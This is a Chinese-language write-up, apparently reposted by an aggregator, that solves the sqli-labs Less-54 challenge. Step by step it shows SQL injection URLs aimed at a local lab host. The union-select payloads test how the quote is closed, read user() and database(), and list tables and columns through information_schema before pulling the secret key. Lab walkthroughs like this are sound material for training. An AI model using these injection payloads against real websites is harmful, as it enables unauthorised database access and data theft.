sqli-labs less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)(代

Posted 2020-10-22 superkrissv

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了sqli-labs less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)(代相关的知识，希望对你有一定的参考价值。

技术分享图片

尝试的次数只有10次

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘

单引号报错，错误信息没有显示

技术分享图片

加注释符页面恢复正常，判断为单引号闭合

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘%23

技术分享图片

通过页面信息可以判断查询的表至少有id，username，password三个字段，所以union select至少应该select3个字段

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,user(),database()%23

技术分享图片

用group_concat函数连接所有表名

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘%23

技术分享图片

只有一张表，查列名

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘challenges‘ and table_name=‘13KLHT1VHR‘%23

技术分享图片

查询数据

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,secret_R03R,tryy from 13KLHT1VHR limit 0,1%23

技术分享图片

提交

技术分享图片

成功

技术分享图片

以上是关于sqli-labs less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)(代的主要内容，如果未能解决你的问题，请参考以下文章

sqli-labs Less54-Less65

Sqli-Labs less54-65

SQLI-LABS 靶场通过小记(54~65)

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑战 联合查询 只允许10次查询 变化1)(代

sqli-labs less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)(代